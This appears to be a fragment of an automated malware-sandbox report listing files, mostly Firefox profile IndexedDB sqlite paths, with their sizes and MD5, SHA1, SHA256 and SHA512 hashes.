SHA512eff9db036c5d4a6f96b8f99e96820fd26a7d1ebe0396cf637d62c800987c751ddf4fb59b50ff06a7dd708fd1aa11406d9634721ccb328d2b478f0fd641287900
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize2.6MB
MD583124382554f11ad79f167012feb3686
SHA10fc5fda0f18a7794394b6fa9cda2c8d4713ca633
SHA25622ddbf62a7be81fd1a82a4156eb351ded8d36d823c5a364234465bd167a1bcef
SHA51298a987ade16ad78510d23d7313b0cd1ee511d5d5ae82dcea73b5cad35a81835bc2ee89da56849aa72d1c472a614a977c06875cbe6bead42a2c9e04eb48ee97b2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.4MB
MD5be297a689086517fe15be73f367d8cc7
SHA155ec73052c78c0a35f2f9f9c4a92d2fcee7c5d36
SHA25636186c9bdee73b5bd0f978f0b7f37f799a5eb41098ed3506e8b35ac357f5344c
SHA5126b78618614071c147974c533308991751f1b8763a81a34141dd058b1e15ca5de49fc44b589fcce2e81b8c845ca15f0881c817886971dcf3fbb21aa0fecb0ecce
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.4MB
MD539f1315946bc72b5a62eee087e8213cc
SHA150d18e48fa310649eb69fa28479e640cd68454a7
SHA256a5e31902d7aaf11334f0a5969e4173e57bb5c94b791a0404ed82e252cc71dfde
SHA5124dc26dd2cb7b4683e1f6d7b1caa9beaf3ff14cfe14df200f7192bac5487dbd54cf4e0c193e7c77c3fbe3c57e68ca9236768a738a1cfe53d6381558795b9ee67d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite
Filesize3.4MB
MD584e42554ab22971f69396758e578457d
SHA12c7e87a02993bf8cd62d7f12c38e789e445b22a7
SHA256467f0d38465f652bfca1e701a6c8d6ded2afc23476c93e9684efb3a85f944150
SHA51290315d74a85ea9bfb7b9c8003a298beef6b3091470244ac501bbea98dfe09a052908d891303f37c3252b0b0b20f5f7cb2bd8647d176a60955eb801dec9ea1631
-
Filesize
1.1MB
MD50aa5410c7565c20aebbb56a317e578da
SHA11b5fd5739d66cdbb3d08b3d11b45bf49851bc4e0
SHA25688a1f9a40eb7ece8999092b2872b6afde0fb3776e29384c5b00631bb0fca34d1
SHA5124d45855719ac2846c5b49a69f4680200cfe0b325a476c3d6624f5bfd56212ccf9858394c0deb98fdca0ed44e8b63720eadcc67577fdbb874c07d9f15b41e4056
-
Filesize
725KB
MD5c136226de242b09248374bcdded70025
SHA106df04ec2e3c056e8cb9cb2b2044a88e0e54f718
SHA256841d0ebecc7dc7b7e06433fcd0cbbec911fa127fee34bfc7c34c946f84aee1ef
SHA5127f2344435a807e9ba5344424ee8a00050ae7f43def2f9c4fb00b9a370d3e89843eada479124f87285c2ca052a3eeb8b75af680cb7bed4eede13f0b6ccafe3123